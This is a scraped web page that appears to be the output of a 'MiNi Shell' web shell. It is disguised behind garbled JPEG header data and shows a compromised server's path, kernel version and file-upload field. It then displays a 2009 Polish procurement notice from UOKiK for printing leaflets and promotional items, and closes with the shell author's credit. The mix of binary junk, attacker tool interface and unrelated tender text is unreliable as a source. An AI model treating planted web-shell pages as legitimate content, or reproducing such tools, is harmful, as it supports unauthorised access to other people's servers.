JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090928/165057-N-2009.html

<p class="kh_header"><b>Warszawa: Druk i dostawa raportu, ulotek i materiałów promocyjnych</b><br>
<b>Numer ogłoszenia: 165057 - 2009; data zamieszczenia: 28.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Ochrony Konkurencji i Konsumentów , Pl.  Powstańców Warszawy 1, 00-950 Warszawa, woj. mazowieckie, tel. 022 5560129, faks 022 8270843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uokik.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk i dostawa raportu, ulotek i materiałów promocyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I Druk i dostawa ulotek informacyjnych wraz z opracowaniem graficznym oraz druk raportu ECK za 2008 rok dla  Europejskiego Centrum Konsumenckiego,
Część II Druk i dostawa materiałów promocyjnych dla Europejskiego Centrum Konsumenckiego (długopisy, notesy, torby bawełniane),
Część III Druk i dostawa materiałów promocyjnych (ołówki, długopisy, kubki porcelitowe),
Część IV Druk i dostawa materiałów promocyjnych (torby papierowe, torby płócienne),
Część V Druk i dostawa materiałów promocyjnych (teczki tekturowe, notatniki, karteczki samoprzylepne, komplimentki, naklejki matowe)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1.1 Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
1.2 Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
Dotyczy Części I - zrealizowali co najmniej dwa zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia. Za zamówienie odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia Zamawiający rozumie druk ulotek oraz publikacji (min. 10 stron), o wartości nie mniejszej niż 6 000,00 zł brutto każde.
Dotyczy Części II - zrealizowali co najmniej dwa zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia. Za zamówienie odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia Zamawiający rozumie druk materiałów promocyjnych o wartości nie mniejszej niż 5 000,00 zł brutto każde.
Dotyczy Części III - zrealizowali co najmniej dwa zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia. Za zamówienie odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia Zamawiający rozumie druk materiałów promocyjnych o wartości nie mniejszej niż 3 000,00 zł brutto każde.
Dotyczy Części IV - zrealizowali co najmniej dwa zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia. Za zamówienie odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia Zamawiający rozumie druk materiałów promocyjnych o wartości nie mniejszej niż 2 000,00 zł brutto każde.
Dotyczy Części V - zrealizowali co najmniej dwa zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia. Za zamówienie odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia Zamawiający rozumie druk materiałów promocyjnych o wartości nie mniejszej niż 5 000,00 zł brutto każde.
1.3 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
1.4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (zgodnie z art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.1 Wykonawcy biorący udział w postępowaniu muszą złożyć oświadczenie potwierdzające spełnienie wymagań określonych w art. 22 ust. 1 pkt 1-4 ustawy oraz braku podstaw do wykluczenia na podstawie art. 24 ust. 1 i ust 2 ustawy Prawo zamówień publicznych - Załącznik nr 1 do SIWZ. 
1.2 W przypadku Wykonawców mogących wspólnie ubiegać się o udzielenie zamówienia, przedmiotowe oświadczenie: w zakresie spełniania wymagań określonych w art. 22 ust. 1 pkt 1 i 4 - składa każdy odrębnie, natomiast w zakresie określonym w art. 22 ust.1 pkt 2 i 3 - wszyscy łącznie. 
2. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie    art. 24 ustawy - Prawo zamówień publicznych, Wykonawca musi złożyć: 
2.1 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.2 Do Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zastosowanie znajdują regulacje określone w § 2  rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz. U. z 2006 r., nr 87, poz. 605 ze zm.).  
3. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia Wykonawca musi złożyć: 
3.1 Wykaz wykonanych - Załącznik nr 2 dla Część I do SIWZ, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia tj. druku ulotek oraz publikacji (min. 10 stron). Zamawiający wymaga wykazania się wykonaniem minimum dwóch zamówień dotyczących wykonania druku ulotek lub publikacji (min. 10 stron) o wartości nie mniejszej niż 6 000,00 zł brutto każde. Podana wartość musi dotyczyć jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy zawartej z jednym podmiotem).
Wykaz wykonanych - Załącznik nr 2 dla Część II do SIWZ, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia tj. druku materiałów promocyjnych. Zamawiający wymaga wykazania się wykonaniem minimum dwóch zamówień dotyczących wykonania druku materiałów promocyjnych o wartości nie mniejszej niż 5 000,00 zł brutto każde. Podana wartość musi dotyczyć jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy zawartej z jednym podmiotem).
Wykaz wykonanych - Załącznik nr 2 dla Część III do SIWZ, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia tj. druku materiałów promocyjnych. Zamawiający wymaga wykazania się wykonaniem minimum dwóch zamówień dotyczących wykonania druku materiałów promocyjnych o wartości nie mniejszej niż 3 000,00 zł brutto każde. Podana wartość musi dotyczyć jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy zawartej z jednym podmiotem).
Wykaz wykonanych - Załącznik nr 2 dla Część IV do SIWZ, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia tj. druku materiałów promocyjnych. Zamawiający wymaga wykazania się wykonaniem minimum dwóch zamówień dotyczących wykonania druku materiałów promocyjnych o wartości nie mniejszej niż 2 000,00 zł brutto każde. Podana wartość musi dotyczyć jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy zawartej z jednym podmiotem).
Wykaz wykonanych - Załącznik nr 2 dla Część V do SIWZ, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia tj. druku materiałów promocyjnych. Zamawiający wymaga wykazania się wykonaniem minimum dwóch zamówień dotyczących wykonania druku materiałów promocyjnych o wartości nie mniejszej niż 5 000,00 zł brutto każde. Podana wartość musi dotyczyć jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy zawartej z jednym podmiotem).
3.2 Do powyższego wykazu Wykonawca musi dołączyć dokumenty potwierdzające, że usługi zostały wykonane należycie. Dokumenty muszą być wystawione przez Zamawiającego/odbiorcę usługi..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uokik.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Ochrony Konkurencji i Konsumentów
Plac Powstańców Warszawy 1
00-950 Warszawa
pok. 415.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2009 godzina 12:00, miejsce: Urząd Ochrony Konkurencji i Konsumentów
Plac Powstańców Warszawy 1
00-950 Warszawa
pok. 415.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Druk i dostawa wraz z opracowaniem graficznym ulotek informacyjnych oraz raportu ECK za 2008 rok..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1.  Ulotka o zakupach i podróżach wakacyjnych w Europie:
- nakład: 10 000 szt.
- format: 280 x 100 mm (przed złożeniem) 70 x 100 mm (po złożeniu)
- papier kreda półmat 170 g 
- kolor 4+4
1. 2. Ulotka informacyjna o ECK w języku polskim: 
- nakład: 15 000 szt.
- format: 200 x 200 mm (przed złożeniem) 100 x 100 mm (po złożeniu)
- papier kreda półmat 170 g
- kolor 4+4

1. 3.Ulotka informacyjna o ECK w języku angielskim: 
- nakład: 2 000 szt.
- format: 200 x 200 mm (przed złożeniem) 100 x 100 mm (po złożeniu)
- papier kreda półmat 170 g
- kolor 4+4

1. 4. Opracowanie graficzne i druk raportu ECK za 2008r. 
 - nakład: 50 szt. 
 - format A4
 - papier do środka broszury - satynowy 160g
 - papier na okładkę - satynowy 200g
 - nadruk w środku broszury - kolorowy
 - nadruk na okładce ( z zewnątrz i od środka) - kolorowy
 - objętość 16 stron + okładka
 - druk cyfrowy.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 15.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Druk i dostawa materiałów promocyjnych dla Europejskiego Centrum Konsumenckiego..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1. Wykonanie długopisów z nadrukiem ECK
 - ilość 1 000 szt.
 - typ Rio Satin lub równoważny
 - kolor srebrny z niebieskim uchwytem
 - wkład jasnoniebieski
 - nadruk logo ECK kolor 4+0 oraz adres www.konsument.gov.pl
2.2. Druk notesów tzw. bloczków ECK:
 - nakład 1 100 szt.
 - 50 kartek w bloczku
 - format A5
 - kolorystyka 3+0
 - obustronnie biała/szara kartonowa przekładka na spodzie
 - klejone od góry 
2.3. Wykonanie toreb bawełnianych z logo ECK:
- 100% bawełny niebarwionej,
- gramatura: 130g/m2;
- 38 cm x 42 cm;
- naturalny (beż);
- pojemność 10 litrów;
- długie uszy
- ilość - 1764.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 15.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Druk i dostawa materiałów promocyjnych wg załączonych wzorcowych projektów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1. Wykonanie ołówków okrągłych drewnianych z gumką
- ilość - 500 sztuk
- kolor -czarny
- nadruk: dwa nadruki, jeden 2 kolorowy, drugi 1-kolorowy
- zatemperowany
- wymiary: o 7x191 mm
3.2. Wykonanie długopisów 
- ilość: 500 szt.
- model: X-One Frost lub równoważny
- kolor: przezroczysty
- wkład: niebieski
- automatyczny z transparentną główką
- nadruk - 2 kolorowy na korpusie
3.3. Wykonanie kubków porcelitowych
- ilość: 500 sztuk
- model: Round lub równoważny
- kolor: granatowy
- nadruk: dwa nadruki 2 - dwukolorowe
- pojemność: 300 ml
- wymiary: o 83x103 mm.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Druk i dostawa materiałów promocyjnych wg załączonych wzorcowych projektów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4.1. Wykonanie toreb papierowych
- ilość: 500 sztuk
- papier prążkowany beżowy ekologiczny
- model: Kraft 90g/m2  lub równoważny
- uchwyt: sznurek bawełniany
- górna zakładka oraz dno torby wzmocnione tekturką introligatorską 
- wymiary: 90x240x320 mm
- nadruk: dwa nadruki 3-kolorowe
4.2. Wykonanie toreb płóciennych
- ilość: 300 sztuk
- materiał: naturalna bawełna 100%,
- model: Arrecite z krótkimi uchwytami lub równoważny
- gramatura: 150g/m2
- wymiary: 380x420x2mm
- nadruk: dwa nadruki 3-kolorowe.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Druk i dostawa materiałów promocyjnych wg załączonych wzorcowych projektów                   (z wyjątkiem komplimentek, których projekt należy wykonać).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 5.1. Wykonanie teczek tekturowych
- ilość: 600 sztuk
- z dwoma skrzydełkami, z nacięciem do włożenia wizytówki 
- format: 220 x 315 mm po złożeniu
- karton 300g
- biały spód, kolorystyka 2+0
- folia matowa jednostronnie
- sztancowane z wykrojnika, brak klejeń
- teczka bigowana, dostarczona w formie złożonej
5.2. Wykonanie notatników
- ilość: 500 sztuk
- format: A5
- 100 gładkich kartek w bloczku, bloczek klejony po krótkim boku
- papier 80g
- wymiary: szer. 148 mm, wys. 210 mm 
- przednia okładka kreda matowa 300g
- tylnia okładka kreda matowa 240g
- nadruk: 2+0 - zarówno okładka, jak i środek
5.3. Wykonanie karteczek samoprzylepnych
- ilość: 500 sztuk
- typ Post it lub równoważny 
- 100 karteczek w bloczku
- papier gładki biały 80g
- wymiary: 76x76 mm 
- nadruk: 2+0 - zarówno okładka, jak i środek
5.4. Wykonanie komplimentek
- ilość: 500 sztuk
- papier kreda matowa 280g
- kolor: 2+0
- wymiary: wys. 80 mm, szer. 165mm
5.5. Wykonanie naklejek matowych z logo
- ilość: 7 000 sztuk
- naklejki pocięte z dodatkowym nacięciem z tyłu w celu łatwego odklejania 
- 2 rodzaje naklejek, każda w nadruku 2+0, po 3 500 sztuk każdej
- wymiary: szer. 85 mm, wys. 30 mm..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com